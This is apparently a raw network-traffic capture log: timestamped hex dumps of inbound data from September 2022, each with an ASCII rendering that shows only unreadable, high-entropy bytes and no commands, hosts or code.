                                                                                                                                                2022-09-29 12:51:55 UTC34035INData Raw: ee 88 c4 df 66 51 e5 57 de 34 2e ab a1 d9 3e 94 9d 1a 21 3b 73 d3 4b 46 44 9b 7e b2 cd c9 ca 75 a5 34 17 db ea 95 29 b2 05 3d 87 8a 35 4f ef 06 0a 59 6d ea 4d c3 13 19 3f 51 2b 5a a6 78 27 20 04 e4 66 10 8d 2d 18 bd 47 c4 e8 57 99 e0 31 89 e0 13 0a cd 0c 8d 14 df 8f fe e9 df a7 d2 fd 3d b9 20 b4 0d cf c2 b7 dc da 07 0e 35 5d 1d 62 11 12 f1 f6 25 79 44 4d 41 89 b2 2b 3f 5d 80 c7 bd db 33 e7 84 63 c3 37 a7 44 71 de 9d 39 a9 e7 8c 64 d8 a8 11 45 02 3a ab 42 34 4e e4 88 f7 6d 40 9a c7 48 3d 34 1f 5e c5 72 41 d3 dc 7a be 4a 9a 04 22 ed c6 28 c9 50 26 78 f0 f6 d2 f9 4c a2 5b ac 97 92 95 c0 ba 79 89 3d f8 da 54 c9 7d c6 2a 20 b6 09 f8 52 4a c7 56 e9 3c 14 8a 56 07 60 38 c6 a4 95 17 ca 21 61 2a da db fe 0a 65 c7 fb 29 35 80 16 6a 9b e2 f7 43 5f 1c 82 3d 56 69 0f
                                                                                                                                                Data Ascii: fQW4.>!;sKFD~u4)=5OYmM?Q+Zx' f-GW1= 5]b%yDMA+?]3c7Dq9dE:B4Nm@H=4^rAzJ"(P&xL[y=T}* RJV<V`8!a*e)5jC_=Vi
                                                                                                                                                2022-09-29 12:51:55 UTC34051INData Raw: cf c3 01 c4 9f 2f 2c a1 6d 0d dd 8f 8a 69 38 d9 85 b1 00 dc 5b 7e 12 18 f9 f6 7f bc 41 a1 4d e8 50 e0 52 0d 79 9f 87 46 86 0d e2 8d ea aa 61 ea 92 7e f6 aa c6 20 d6 54 47 ad ac 47 47 d7 6e 80 86 1a 1c e3 f4 96 02 d3 71 be ea c3 c6 65 fb 43 b7 f6 6c 52 de a3 61 e5 62 e2 bd 73 d6 68 2a 1f 18 d7 7d 5d 0f 94 9e 5f b3 c4 2b f7 38 07 1b 58 28 9c 49 7b 20 61 00 bf 9f 8f 4c d7 c1 c2 a3 15 66 6c 58 ec 65 39 52 50 69 7c fb f2 70 5c 90 52 bc 43 f5 9a c9 a7 07 b3 3a bb 39 35 d6 f4 41 7f 38 ec 44 f2 49 1a a5 5d fb 5f 35 80 e0 a1 0e 9a 2a fa 16 25 8d c6 8e 95 99 36 65 4d a9 8b 9c f0 2e 88 32 6a 6e 3d 2c cf 74 0c d1 7c 8e 00 1b 4e 3b 17 2a 10 51 6e 23 71 99 5a e7 0d 9a a4 88 6c 93 da 65 40 77 d8 e6 a5 bc 52 92 ac 78 2f d1 db 6a b4 cb cb 68 b4 05 e4 2f f5 ae 0e b7 0d 0b
                                                                                                                                                Data Ascii: /,mi8[~AMPRyFa~ TGGGnqeClRabsh*}]_+8X(I{ aLflXe9RPi|p\RC:95A8DI]_5*%6eM.2jn=,t|N;*Qn#qZle@wRx/jh/
                                                                                                                                                2022-09-29 12:51:55 UTC34067INData Raw: 7a b3 0a 75 a5 93 8d d2 fd 35 4d 55 c1 06 75 7e 6a 17 ed d0 89 3e 4c 43 31 07 71 bc e9 67 e7 c8 26 7a 0b 30 e6 30 f1 8a b0 27 1e 0f 34 0b bf dc ca 60 b7 42 fa 1d 56 f8 3f f8 d6 b4 51 d1 34 0d 7b b5 39 db 5b 39 7c 28 2b 08 1a 86 6a 33 03 26 b0 5e 6d eb d1 2f c6 4f 4b 97 76 34 00 81 de 4f 28 50 99 ea 73 90 91 c7 8c cc 24 33 a4 1b 76 a5 d2 f2 6c 2a fc ad 1a 7b b1 b2 ca 78 75 d8 b9 d1 6c e0 9d f8 08 07 4b 32 fb bb d2 5b 4d d7 4a 69 60 35 07 7c e1 11 62 22 f5 fa bb 13 fe f9 9b c9 33 9d 4e c1 3e 53 75 0e f8 b9 25 c2 2a c7 2e 59 1b 58 c1 98 60 23 dc 9c 16 cb 01 fe ef f5 b8 2b 3b 62 af 60 c3 79 86 53 f2 28 2a e9 f1 33 aa a7 55 93 fd 95 e1 ac e1 dc 58 02 98 ea f2 ef e9 25 05 88 5f 75 38 f1 a5 94 53 df 59 54 14 2b 63 e4 4c b1 1e 80 47 65 70 04 9b aa 0a 70 b0 5f ba
                                                                                                                                                Data Ascii: zu5MUu~j>LC1qg&z00'4`BV?Q4{9[9|(+j3&^m/OKv4O(Ps$3vl*{xulK2[MJi`5|b"3N>Su%*.YX`#+;b`yS(*3UX%_u8SYT+cLGepp_
                                                                                                                                                2022-09-29 12:51:55 UTC34083INData Raw: 95 5d 1d 35 7b ca b3 22 14 fc 3e 35 b6 ef a7 39 82 01 3d 02 74 4d 2b d9 f6 a9 47 31 73 91 d8 f8 6e 69 e2 e9 f6 53 00 5c 58 52 26 c5 9e 4e 79 5f 75 c9 99 d1 ba a6 a4 38 52 2d cf 40 62 72 8e 48 8b a9 7b 95 bb 4f 6b 3b 66 36 49 e2 c3 b4 f2 9e 2f 5a 47 21 66 87 ad b7 f9 db 70 6e c0 1d 48 ed 96 2f c5 26 72 97 22 64 ce 8a a6 a4 f8 5d f3 d4 fa 16 f5 04 a1 34 40 4b ba 89 36 12 78 4c 59 66 51 34 29 db 4d a2 82 8f f3 45 4b a3 75 0d a5 eb dc 28 60 bb 95 84 9a 86 e8 11 89 2f b1 b6 29 a5 22 31 bb 79 b6 0b f4 a5 7d ae 85 ab 14 0f e9 95 aa 7f b0 17 d6 07 3c 69 99 f1 16 19 58 13 dd d2 98 c2 24 89 a1 6e b2 96 bd a3 b8 79 94 45 e9 eb 90 85 07 3a 4e 2d 55 3a bb 7a 52 8e 19 04 81 29 33 4a bd f2 a5 aa af eb ed 56 eb bc 9e 7d 30 95 69 d5 a8 e2 23 36 ce d3 29 59 dd 5e 76 2e 51
                                                                                                                                                Data Ascii: ]5{">59=tM+G1sniS\XR&Ny_u8R-@brH{Ok;f6I/ZG!fpnH/&r"d]4@K6xLYfQ4)MEKu(`/)"1y}<iX$nyE:N-U:zR)3JV}0i#6)Y^v.Q
                                                                                                                                                2022-09-29 12:51:55 UTC34093INData Raw: 9d c6 67 d9 52 4e 43 69 01 b3 3e e1 25 ec d4 f8 e4 09 8d ef 0c 02 98 8d 4f 50 c9 a8 74 c9 84 05 87 61 05 cb b8 c6 46 f6 de ae 78 2f 4e 92 07 34 a6 fd 7b 1a 35 a8 c8 3e 67 47 90 0d 5e 4e e2 34 08 d9 0f 69 26 77 03 eb 31 8d e9 4a 7d 68 d4 53 d0 17 ca 56 4d 1a 19 bf 2b 9b f7 9f 54 5b da 75 58 ca b1 4e 9e be f9 4b fb bc b1 6c bd ba 73 8d bd 8b 00 3c 6c a7 12 22 94 3e 32 63 02 ad 7f 15 d9 3a 8f 98 1f 55 a5 33 47 76 d9 34 25 c2 bd 4a ea a2 8b ce 01 ba f0 9c 0d 78 e8 22 d7 f0 8b f2 5b b2 bc e8 cd 09 0f 8a dc 63 38 99 cf f5 b9 d2 1d d9 01 71 92 ae 02 e9 cf 44 0e 9b de f4 83 68 3f 89 b8 2f 02 d7 c9 42 19 07 d6 79 01 17 0f 7e eb 98 ec df 30 66 bc 4a 17 ca 2c c7 f5 68 17 b7 03 8d cd ec a5 46 71 f7 f8 47 a2 1c 95 b3 45 4d c5 34 25 74 b8 b0 b7 7e 3b 1f 7a 33 62 9c ff
                                                                                                                                                Data Ascii: gRNCi>%OPtaFx/N4{5>gG^N4i&w1J}hSVM+T[uXNKls<l">2c:U3Gv4%Jx"[c8qDh?/By~0fJ,hFqGEM4%t~;z3b
                                                                                                                                                2022-09-29 12:51:55 UTC34109INData Raw: ee f5 b1 b6 20 5e a8 07 3c 3b e2 75 6c 7c 9f 80 d8 0c 48 d4 31 22 e2 3f 06 ef 8e 6d 14 c1 2c 01 ae 17 3c 38 e0 19 9a f3 93 be 9c e3 2c 4d 2c 7c 88 a4 99 5e 70 dd 8b 7a 4a 0b 0d a8 c8 15 d1 5f 09 66 7f bf 36 e5 30 4c 4b f7 90 eb f8 a9 ed fe 26 93 2d 95 0d 34 8e 73 f2 e6 42 43 68 41 f0 ec 80 73 d9 49 4a c5 48 e5 de 3e c5 5b d3 aa 65 7d 95 83 f9 cf fc cb 89 aa de 30 6d c7 80 62 f0 84 1f 5f ed cf c5 c2 b1 78 d4 4e 67 b7 fa 4f ec 2e 41 3e fb 95 85 fd 61 c7 ed 34 d4 42 3c b2 27 20 b7 0a 7f 7d 14 48 d5 4a cb 5b 37 0e fb 49 f3 2f 31 49 10 b5 5b 54 67 aa 59 ab d3 d7 4a 2f 6b 5e b1 db f1 98 5d ca 84 66 f2 16 61 4d db 6c a0 91 16 c5 e6 bf dc 01 f5 af d8 f1 5b 14 ad 71 de a7 e1 04 bd 18 87 3f 17 d0 31 a3 bc fd e0 92 55 84 a1 7a 84 7b eb e4 91 aa f7 6e 4d a9 b0 87 fc
                                                                                                                                                Data Ascii: ^<;ul|H1"?m,<8,M,|^pzJ_f60LK&-4sBChAsIJH>[e}0mb_xNgO.A>a4B<' }HJ[7I/1I[TgYJ/k^]faMl[q?1Uz{nM
                                                                                                                                                2022-09-29 12:51:55 UTC34125INData Raw: 06 e7 17 f6 6f f5 a6 be 51 5e 4c 4c cd 90 3f 74 a9 d1 47 fa 4e 60 7c 7a 60 10 7a 05 c4 4a be 5c 63 3c e7 5a b1 6c fd c4 ec 80 58 21 70 b8 7b b2 4c 3a 55 cf c0 9b 13 e8 e9 ac 9e a3 fc 81 04 4b aa c8 5a 98 60 a9 6f e0 11 69 2f 5d 29 59 ed 0a 89 88 a2 e1 c8 64 75 6b 19 7b 6b 57 a2 82 b7 1e 85 e9 39 8d 1f f6 53 5d b6 32 78 bc 2a 1d df a0 8a 75 cb 95 1d 3c 5f 57 3a e0 df 1e bc 50 97 57 1e 66 8b f2 02 1a 18 24 e3 90 4e 5a 9c b1 40 2e f8 f7 21 b3 3f ef 18 6b 6f 03 33 05 ec 61 17 ab 3f 47 4c 6a 06 9d a3 27 84 f3 0d 1b f0 14 cc e5 32 20 cb 78 5b 51 4f 61 a6 0d fd b9 e9 53 21 09 94 57 56 1e fc 2d 61 c4 a4 07 85 c7 57 69 9c 38 35 dc fe 86 0e b9 f9 99 0c f7 f1 50 d6 48 ab d2 90 2c aa 88 cd e8 7e 42 40 09 9f b5 2d 12 fe 6e dc 8b 67 c9 a7 53 0e 7a d3 7c a6 bb 29 14 0d
                                                                                                                                                Data Ascii: oQ^LL?tGN`|z`zJ\c<ZlX!p{L:UKZ`oi/])Yduk{kW9S]2x*u<_W:PWf$NZ@.!?ko3a?GLj'2 x[QOaS!WV-aWi85PH,~B@-ngSz|)
                                                                                                                                                2022-09-29 12:51:55 UTC34141INData Raw: f8 16 f3 d0 4d bd 38 a4 ac 61 71 cb 0e c4 ce 03 30 7a f0 e3 2f 94 c9 3e e5 cb e1 05 d3 37 e6 7f dc 01 6d 98 7b cd 50 c1 ea 3a 61 68 10 c5 a6 52 98 87 d4 28 73 9a 6d cd d7 48 ef 7f ea af dc 94 8a 9e 9c 1c ce 5d 0c a0 2c f3 fe d0 b8 11 32 92 52 94 2d 5b e3 d3 f4 02 79 57 c9 a7 c5 05 ad 04 88 dd 8e 15 78 50 ec 03 18 1c ee f5 64 7e 01 7f 41 16 5b cf 8c 55 00 11 a8 33 a5 31 ea 44 65 b3 e3 ab 69 f0 5f 24 a1 de fa 96 10 07 e8 8e 7b 72 a4 64 a1 ad ae 98 73 17 d8 78 15 9a 1a e9 51 97 cd 54 0d b1 b9 36 ec 73 6b 25 78 f8 2a 8b c2 7b f7 57 4e 84 6c 39 bb 4d bc f5 e4 c6 91 19 73 5a 5b 76 fe cc a3 b4 08 93 3e 79 b4 5f 01 ca 3f c4 56 21 b4 49 4c c3 b9 23 5b 9b 5f 67 d0 12 23 fb 4b bf 88 d5 b5 cd 3d ce 57 4c 5d 23 2a a2 31 89 e0 2d dd d8 83 df 7e 3d b4 62 29 d0 2a c8 e1
                                                                                                                                                Data Ascii: M8aq0z/>7m{P:ahR(smH],2R-[yWxPd~A[U31Dei_${rdsxQT6sk%x*{WNl9MsZ[v>y_?V!IL#[_g#K=WL]#*1-~=b)*
                                                                                                                                                2022-09-29 12:51:55 UTC34157INData Raw: d0 42 8f e8 c6 04 a7 3b 89 2b 26 7f b9 fd f4 26 79 c9 c1 a1 9e f8 d3 d0 78 85 b1 91 ac 43 45 8d 3f 50 1c 93 f0 fb 7f dd 89 a6 68 03 f1 5c b1 ac 2b fb 3e 47 9d 30 5e 9a 03 38 63 3d ae 6c 65 95 42 7e f3 00 15 6a fd b9 21 08 37 9c 95 51 3b c5 f7 08 06 7a e8 b9 da c7 38 81 fd d1 ac 6b a1 c1 b2 47 b4 41 9c 61 0c 85 81 82 3e 92 5e 07 c8 bd f2 21 31 c1 4c ab cc ea 01 cb 8b 71 51 95 a0 b4 ba 17 b7 40 e8 35 68 3b 02 66 fc 3c 75 17 30 13 08 1d f8 d4 4d 4b 00 69 ef 76 88 ea ca c3 67 77 a6 ee b1 1d f7 15 2b 08 b5 c1 3d 39 47 97 aa f4 b9 9a 42 9e 96 79 82 b7 7b 7a 9a 0a dc 70 0d 18 bb a7 95 93 d9 c3 60 78 22 14 34 4b 27 3c b4 20 ff 16 5f cc 4e 86 7b e5 47 5a 7e 5a 71 a1 bc e9 00 6b cf 0a 60 f0 bf 86 5d af a5 87 59 d9 b4 45 8c 9b 0f 12 e7 f9 f4 3d ca 15 1b 89 77 ae 07
                                                                                                                                                Data Ascii: B;+&&yxCE?Ph\+>G0^8c=leB~j!7Q;z8kGAa>^!1LqQ@5h;f<u0MKivgw+=9GBy{zp`x"4K'< _N{GZ~Zqk`]YE=w
                                                                                                                                                2022-09-29 12:51:55 UTC34173INData Raw: 2f bf 5c 35 c6 3f 41 10 55 e0 eb 9b 96 64 28 10 ca 6b eb df 99 63 20 11 de 10 17 74 59 0d b6 c8 66 8a f2 41 90 f3 4b 0c 8b 2b fc ad 66 3a 1b 75 09 85 1c 37 5d 21 a0 29 cf f2 68 7d 44 b1 52 1a 0d 20 49 fe eb 29 fc ae 73 69 6d f5 cb ff ff a0 a5 0b 43 fd 89 bf 3c f3 e1 1d 91 8d de 6a 74 0e 68 7b 2b ec de 91 e0 3d 3e d4 d0 e9 4b b2 b1 19 16 e5 69 ef c7 54 65 fb 5a 1a 90 c0 fe ff 9d 02 9f b1 c9 1d 4e 4e 1a dc c9 bc a9 7a 1e 12 67 4d 5e 3f 89 af aa a7 08 49 ad a0 82 fa 97 f1 bc 63 ac 0a 64 4f e3 bf a6 6e 0f a5 79 6e 0e 62 42 7b b7 51 1e c0 22 c4 b7 59 cc bb 0d 54 43 cc 1e ba 5f c3 d9 c2 ce 97 2f 05 17 8c a8 3f 9d 68 70 e1 b8 4f e4 98 3d 10 2e e9 c9 60 0e d8 51 87 24 57 81 20 fc e0 ac 35 cf 03 a8 95 48 58 4b bd 7c 91 3e 8f 81 18 1c 70 53 f6 4b 86 63 6c bf 88 da
                                                                                                                                                Data Ascii: /\5?AUd(kc tYfAK+f:u7]!)h}DR I)simC<jth{+=>KiTeZNNzgM^?IcdOnynbB{Q"YTC_/?hpO=.`Q$W 5HXK|>pSKcl
                                                                                                                                                2022-09-29 12:51:55 UTC34189INData Raw: 27 e6 07 5c fb eb 7f 27 c1 67 55 ea 00 f4 c8 1f 31 52 f5 13 83 cc 72 2a b5 64 5e 22 af 56 38 fa d1 05 17 a2 10 e3 ea 77 c4 a9 45 4d 1e 40 33 cc 57 19 5d 2f 08 c9 5b 3b ae 5f fa 95 23 e9 bb 2a 29 37 4f a6 28 39 c7 e3 c8 2a 76 32 81 e0 b0 00 40 80 d1 2a a3 f8 91 4f 26 75 54 fd 20 da fc 5c 72 ae d8 43 a5 5a 53 21 45 be c7 0f 80 29 4c 76 7a 19 6d 12 40 4a 3b 80 d1 c1 fa 27 ee fd 84 da 54 1f 10 99 48 fd 40 cf 8e ca 68 54 09 8e d7 fe ce db b8 10 32 3c 26 b8 78 a2 2f 4f 8a 5c fa c8 db 97 d0 87 a7 c1 3f b8 d2 5d 0c de d5 ec 08 c1 cd ca 37 e8 af f5 99 24 5e 14 55 c5 00 92 3b 9f c3 62 b0 06 b7 73 09 f0 4c 9c 0e 2e db 34 fc 71 62 8f bf 95 df 83 7e 5b c3 b6 27 cb ca 24 8e cf 05 04 0b 76 ea 1a 38 61 c1 dd 94 99 d5 b5 1f 3e 6f 5b 24 43 62 72 70 71 b0 f9 c1 42 b0 ee 43
                                                                                                                                                Data Ascii: '\'gU1Rr*d^"V8wEM@3W]/[;_#*)7O(9*v2@*O&uT \rCZS!E)Lvzm@J;'TH@hT2<&x/O\?]7$^U;bsL.4qb~['$v8a>o[$CbrpqBC
                                                                                                                                                2022-09-29 12:51:55 UTC34205INData Raw: f3 84 49 b3 c5 82 25 a9 4c 90 83 d4 fa ec c9 ee 83 1d 58 95 73 3f 8d e9 21 6a c4 e5 44 18 05 c3 1e fa 53 e8 b8 52 a0 1d 5e a7 e1 ce c3 f4 a3 31 df 3a 6e bf 14 7a 35 ee 8d 77 fa 7d 75 6b 27 7e da 9c 16 9d 07 f8 44 5f ad e6 51 74 ef 06 a5 54 6c af b5 04 81 81 f8 4d e0 6a d1 5f cc ef e8 24 90 ca 5f 27 25 5f c2 c5 04 fc 37 c4 5c f4 a5 5b b7 08 ef 28 63 c9 f5 22 f1 da 93 91 48 d9 7c 96 82 a5 ef 66 cf d1 1e 0e 8f 6f fc 13 54 6b 6d b4 54 2e c8 57 f1 60 18 7f a2 dd 0c 13 1f a3 01 05 a9 2c d7 e5 b8 9e 7f f6 31 90 12 32 b5 bb ac c7 61 0a e2 2f 69 3a 75 00 a7 04 94 13 f1 e9 6f 06 a5 45 66 c2 1b b7 77 b9 98 b4 bd 9b c3 f3 89 76 f7 3e a1 b7 23 67 3f 3e b8 8d 1f de 83 7f 71 39 aa 58 11 13 c1 20 c9 3e 07 eb dc 4e e4 db fa 1c 14 50 8f f8 f8 e9 41 dc af 98 c2 1f a1 29 21
                                                                                                                                                Data Ascii: I%LXs?!jDSR^1:nz5w}uk'~D_QtTlMj_$_'%_7\[(c"H|foTkmT.W`,12a/i:uoEfwv>#g?>q9X >NPA)!
                                                                                                                                                2022-09-29 12:51:55 UTC34221INData Raw: 8b 9b d5 32 1e e2 9c b0 64 0a 16 a1 c5 3f 35 45 b9 0a a4 58 cd ed 5c ba d0 21 7c a2 df 02 73 a1 60 09 ce 31 2f 9d 02 9f 18 4b e5 87 41 f2 f9 05 83 ff 10 d3 64 d3 bc 20 21 95 be 5b 70 71 d2 c1 89 a1 33 b6 3a e7 18 91 4d 0f 81 28 a4 98 a0 7f 8a 2b 43 76 d3 bd 9d 60 99 80 87 fa 08 2b ae 94 56 38 d9 48 22 45 1d f8 2d b5 04 ec df bc dc 75 91 4f 72 a9 a3 92 c0 78 73 47 6d 80 8e 53 33 b6 55 20 cf 6c 98 76 25 9e 00 5d 44 a8 88 53 e5 6d ce de 8d 8e fb af 3e c8 e1 2a fa d9 e1 5f 93 e2 99 ca d7 e1 87 e0 27 2b b7 14 b6 d3 50 39 ca 0e 9c d8 85 93 50 b9 db 41 b4 e6 67 52 18 79 38 db 0d 9b 34 da 25 14 2e 00 ee 5d e6 61 fd 94 a8 11 a2 06 5e 45 06 01 71 72 77 c7 fc e3 b2 1f e6 36 f7 3f bd 9e c2 ed 7a a7 10 86 d9 e3 60 6e 30 e5 0e f3 55 d9 da 11 8c 1e 36 7b 87 00 01 c5 c9
                                                                                                                                                Data Ascii: 2d?5EX\!|s`1/KAd ![pq3:M(+Cv`+V8H"E-uOrxsGmS3U lv%]DSm>*_'+P9PAgRy84%.]a^Eqrw6?z`n0U6{
                                                                                                                                                2022-09-29 12:51:55 UTC34237INData Raw: e8 19 8d 87 46 d5 90 a6 27 cd 6b f3 cd 53 fe 7f 60 28 55 26 ce e3 85 36 6f 95 62 f4 08 50 3c fb 5d bd 96 b2 7c 73 54 df a9 00 d4 20 75 b3 ae a3 b5 04 61 28 a6 13 0b 9d c1 b4 65 a9 b6 d0 36 ec b8 09 de 9e 5b 2e 7c af 23 01 ec d2 a9 7c 6f 02 88 62 80 53 d0 fd de 92 29 69 f9 e7 ed 9a e0 fb f3 29 c7 90 a6 a3 61 12 d7 91 7e 99 34 c1 6c e8 78 e3 80 09 14 9f 26 50 f5 ad e9 4d f4 d2 c2 c7 c8 55 59 21 6e 8f 86 c4 b3 c7 45 c5 7f 5c 9f b3 00 55 53 6b 7c b0 8c b0 2c ed 6a 8e 72 0f f8 4d 2b c6 70 21 43 6e 37 87 ee ed 4c 4d 08 4c a6 12 86 fd 7c ed e6 02 4c 5e cd 70 80 5a 25 63 59 fd 1f 41 b6 de 59 88 8f fd 93 5d c2 5f 05 8c 91 5a eb c7 6b 08 2b 76 a8 91 96 ba 30 4b 67 dc 97 7a d4 6a ad 9d ae 25 13 c1 14 9d 71 b7 8c 30 0d 24 3f 58 fb 10 69 22 c6 80 6d a5 15 13 4e 23 d8
                                                                                                                                                Data Ascii: F'kS`(U&6obP<]|sT ua(e6[.|#|obS)i)a~4lx&PMUY!nE\USk|,jrM+p!Cn7LML|L^pZ%cYAY]_Zk+v0Kgzj%q0$?Xi"mN#
                                                                                                                                                2022-09-29 12:51:55 UTC34253INData Raw: 48 73 09 41 e3 4f 0b f7 0f 11 a2 30 02 25 3a 7e 8a ee c5 74 e1 26 7c 24 60 bf 40 1b a8 a6 92 b5 5c cf 5d 11 df b4 c6 90 94 c0 e5 16 3c cd b1 1e ec bc 4a 03 43 27 a1 9c 55 0e 26 39 41 40 6f b2 36 1c 9a 70 2c ae d5 ee ed 4a 46 88 fb 30 eb b9 a1 f4 7a 73 f8 d7 60 d1 95 08 b9 d7 6c ba 46 61 f7 ed 7c c5 2b db 72 27 5d 1e 5a 85 97 1e ff ec 4f 38 92 58 f1 5a 71 93 79 50 20 70 15 bf c7 fa ce b8 14 16 a4 8f 7b 2e 47 f9 11 58 85 c2 f4 ea 81 e0 b6 1d 55 2e e7 26 d2 1f dd 5c 25 27 ce e1 45 c9 8c b9 93 62 d9 e7 ee d2 bb 3d 79 0f 89 93 c8 4b 3f 9d 40 a0 49 fd 23 04 29 ad 98 58 cf 36 be 04 ac 4f 11 f3 97 c7 98 23 df bf 15 f0 86 d5 7c 90 02 91 d3 46 14 2c db ad 18 51 eb 3d 07 e8 b4 5d 78 83 7c bb b2 ca 33 09 24 ca 92 92 49 59 91 9c 48 27 04 f7 3e 2a 54 47 1f ba e2 e9 f6
                                                                                                                                                Data Ascii: HsAO0%:~t&|$`@\]<JC'U&9A@o6p,JF0zs`lFa|+r']ZO8XZqyP p{.GXU.&\%'Eb=yK?@I#)X6O#|F,Q=]x|3$IYH'>*TG
                                                                                                                                                2022-09-29 12:51:55 UTC34269INData Raw: 6d 11 3e 12 35 0e 40 27 32 4b e7 7a 9e c7 19 cf 7e 0e 15 0f a1 fc d0 2a f6 bc 97 01 9f c9 22 f1 89 ab 95 de aa 85 bb 57 64 29 e0 76 80 4b f2 7a 13 25 6e 06 84 12 ba 9e 4f ab 84 34 e0 2d bb f3 44 8e e6 74 a6 5c f0 21 92 47 db dc a2 9e 95 1b bd ea ef c5 37 d3 d2 8f 3f bb 58 a4 df f9 fb a0 2f 7c 2d 2d a7 0b 06 f6 b7 d4 4e ce d3 e7 1f bb 94 fe 53 df 0f 18 3a 26 3d 50 f9 e4 f7 0b 9a 28 dc 4c 45 88 d4 cb d4 19 f6 79 60 84 25 59 ad 2c 2a 5e 51 bb ba 07 51 7a 39 d2 63 5c c3 70 d3 74 77 f6 5f 91 94 8b b4 8f 1d 70 22 21 a7 43 cb f6 a9 d6 19 fc ee 0c b1 49 a7 6f 3d 19 69 d1 64 52 52 35 45 34 49 53 e7 97 e7 ff f1 99 59 65 83 4f 33 93 69 2b 32 8f 7c a0 5b 40 97 d6 b3 df d7 ff b9 33 ce f5 79 d3 3a f5 ad 38 5b 4e e6 ce 47 e4 c7 aa 8d b7 1c 0f 1e 63 a3 05 c3 4d f4 8a 6c
                                                                                                                                                Data Ascii: m>5@'2Kz~*"Wd)vKz%nO4-Dt\!G7?X/|--NS:&=P(LEy`%Y,*^QQz9c\ptw_p"!CIo=idRR5E4ISYeO3i+2|[@3y:8[NGcMl
                                                                                                                                                2022-09-29 12:51:55 UTC34285INData Raw: 39 80 27 45 1c 3a d1 88 e7 19 a2 56 25 eb c7 68 d9 8f 68 f8 3c 9f b6 f5 da 02 3c 01 35 13 25 3b 07 8c 62 12 5b d5 01 87 fe 38 fc 3b 01 2a 71 0f 99 81 ab 2a 14 ba 98 76 2f 9c 93 ba c6 77 9e 91 52 64 3e 39 64 39 66 1f 49 79 8e 7d 5b 11 9b a3 a1 14 af c1 27 ae 8a 60 ca d6 a5 74 c6 53 d5 4d 04 2d 44 7a 67 f3 cb ac dc b4 fb ec dd 23 23 77 d9 d5 af 38 44 54 40 7a 43 42 0c e1 b7 f7 65 41 7e 45 01 8c d0 43 cd fd 63 3e c3 68 b9 e7 a4 c4 1b 87 91 30 47 d2 2e f0 17 5d dc 08 15 a3 a3 b0 4d ff 8c 54 d0 0a 5e 33 80 e8 ed bb ed 4c d3 9c 0d 34 69 82 66 8c dc ca 80 c4 99 7a e6 1a f2 73 79 95 cd b1 52 c6 0c 3d b1 7f 64 8b 6a b1 73 76 86 56 78 8f 46 fc 74 0f d7 87 5e cd 70 03 c0 93 b6 ae 81 44 e4 4e bc f0 fa 0a d3 cd 9b cf 6b 8e c0 c1 bc 0b fa e0 6a 4e cd 2e 33 45 1c 1f cd
                                                                                                                                                Data Ascii: 9'E:V%hh<<5%;b[8;*q*v/wRd>9d9fIy}['`tSM-Dzg##w8DT@zCBeA~ECc>h0G.]MT^3L4ifzsyR=djsvVxFt^pDNkjN.3E
                                                                                                                                                2022-09-29 12:51:55 UTC34301INData Raw: 1f ea a4 5b a2 71 ef b3 f1 e9 89 26 01 56 16 ed f3 f9 c5 61 9e cc db 4d 27 fa 65 ed 75 5a 06 38 f7 59 d2 87 ea 9c a8 b4 46 1b f4 67 9b 9a c1 b1 d4 f1 ea b5 53 86 c9 64 bb 10 bd 6a 07 50 5f 43 cb f8 df 4c 12 ef e7 21 a9 45 4a 13 b8 d6 4e 5d c5 3f 5d c1 79 82 6d e0 fb 33 4d d2 46 62 c3 67 de e5 2b ec 7a ec 95 01 a8 92 c1 c6 ac fd c6 87 cc 0c 02 25 c8 a9 37 c0 98 cf d2 2c fa 9f f9 7c 33 b4 31 6c bc 23 42 2d be b1 4d d9 88 ee 55 04 04 14 0f 05 45 ad 49 e8 ba d8 f6 2b 7b 23 8d 4f 32 31 04 18 25 43 c1 1e bd 81 3e 9d 94 a5 07 c7 79 22 5c b6 66 97 94 d7 8b ca 8f a1 21 43 a0 12 05 14 1d 6f 3d 58 2d 0f 81 fe 10 24 99 73 90 3d 2e c2 80 c6 35 9d e0 19 3d 54 9e bd 87 c0 60 83 4a 7b ab 33 b4 77 13 51 48 a4 3b 99 f0 cf e4 24 ee f3 09 d4 2d 65 b3 9a 4d aa fb 24 30 cd cd
                                                                                                                                                Data Ascii: [q&VaM'euZ8YFgSdjP_CL!EJN]?]ym3MFbg+z%7,|31l#B-MUEI+{#O21%C>y"\f!Co=X-$s=.5=T`J{3wQH;$-eM$0
                                                                                                                                                2022-09-29 12:51:55 UTC34317INData Raw: a4 eb 4e 08 62 f2 2c 16 d0 25 f5 e0 63 a8 ba 58 ff 1d 40 a2 f1 5f 68 86 87 f8 b8 9c d6 92 e5 cc d5 64 20 45 5b bb 74 48 84 a3 a0 15 c7 22 a8 dc f4 3f 56 62 fd f3 8d 3a 6d fb 64 a4 24 40 16 1a 80 54 81 e1 d8 ef a9 3c b0 d8 ea b3 99 c8 8b b5 9b 1b ad 97 d8 c7 43 1f cb 13 d0 13 42 aa 35 1d 60 9e a2 7b 1d 79 a7 db c9 b8 94 70 be 6c 0e 0f 84 cc 2e bf e4 ac 7a f8 90 f4 25 dd 97 df a7 be 69 9a b9 1c ca 3a fc e1 8c 33 ef cf 23 06 99 d7 9f 87 16 a7 b0 91 61 ef 26 23 0f 09 94 a8 16 ca b5 ff e1 b7 4a 5a 21 5b 8b 0f b6 71 10 96 a8 44 47 65 91 93 5e 54 3c 94 11 31 39 6a d1 0e e3 d5 76 d3 41 93 83 f0 67 32 b5 60 8e 8c e7 75 e2 73 53 c9 05 df 58 cc 8e b3 dc a5 11 3e 33 9f 0c ca ac 6e 73 2c 58 a2 d2 89 8c 37 46 ff 39 83 de 78 bc e9 a4 f9 07 05 f3 29 85 b1 be c4 8f 56 86
                                                                                                                                                Data Ascii: Nb,%cX@_hd E[tH"?Vb:md$@T<CB5`{ypl.z%i:3#a&#JZ![qDGe^T<19jvAg2`usSX>3ns,X7F9x)V
